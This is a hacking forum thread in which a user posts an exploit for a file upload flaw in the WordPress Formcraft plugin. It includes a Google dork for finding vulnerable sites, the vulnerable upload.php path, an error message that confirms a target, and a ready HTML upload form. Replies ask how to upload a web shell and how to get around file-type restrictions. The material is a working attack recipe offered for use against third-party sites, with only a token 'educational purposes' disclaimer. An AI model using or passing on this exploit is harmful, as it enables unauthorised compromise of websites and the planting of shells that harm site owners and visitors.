Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Wordpress Formcraft Plugin File Upload Vulnerability

  • 0 Vote(s) - 0 Average


03-18-2017, 08:15 PM #1
ahadyusuf Offline Junior Member **
Registered
Posts:1 Threads:1 Joined:May 2014 Reputation: 0
Mood: None
Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
Exploit Author: Iranian Anonymous
Vendor Homepage: [https://wordpress.org/plugins/formcraft-form-builder/]
Software Link: [-]
Version: [All Version]
Tested on: [Windows_Google Chrome & Mozilla]

Exploit:Exploit:[SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
If you have received this error
--> [{"failed":"No file found 2"}]
This means that Your Target Has This Vulnerability. Clapping Clapping Clapping

Script file Upload ==>
[<title>MaN_On_Da_EdGe</title>
<text>CW Wordpress Exploit</text>
<form method="POST" action="
[Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
" enctype="multipart/form-data">
<input type="file" name="files[]" /><button> Shit-it</button>
</form>]
Discovered By: Hacker Khan







[Image: vsoua8.jpg]

03-19-2017, 12:16 AM #2
joker-dz Offline Junior Member **
Registered
Posts:12 Threads:3 Joined:Mar 2017 Reputation: 0
Mood: None
Need video how to upload shell in your exploit :/

03-19-2017, 07:31 AM #3
[email protected] Offline Respected *****
Respected
Posts:25 Threads:5 Joined:Feb 2013 Reputation: 0
Mood: None
(03-18-2017, 08:15 PM)ahadyusuf Wrote:  Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
Exploit Author: Iranian Anonymous
Vendor Homepage: [https://wordpress.org/plugins/formcraft-form-builder/]
Software Link: [-]
Version: [All Version]
Tested on: [Windows_Google Chrome & Mozilla]

Exploit:Exploit:[SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
If you have received this error
--> [{"failed":"No file found 2"}]
This means that Your Target Has This Vulnerability. Clapping Clapping Clapping

Script file Upload ==>
[<title>MaN_On_Da_EdGe</title>
<text>CW Wordpress Exploit</text>
<form method="POST" action="
[Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
" enctype="multipart/form-data">
<input type="file" name="files[]" /><button> Shit-it</button>
</form>]
Discovered By: Hacker Khan







[Image: vsoua8.jpg]
hi
try to upload shell and learn to us how bypass Whistle
it's upload safe files  like txt and etc ... 99
thanks wink






Forum Jump:


Users browsing this thread:1 Guest(s)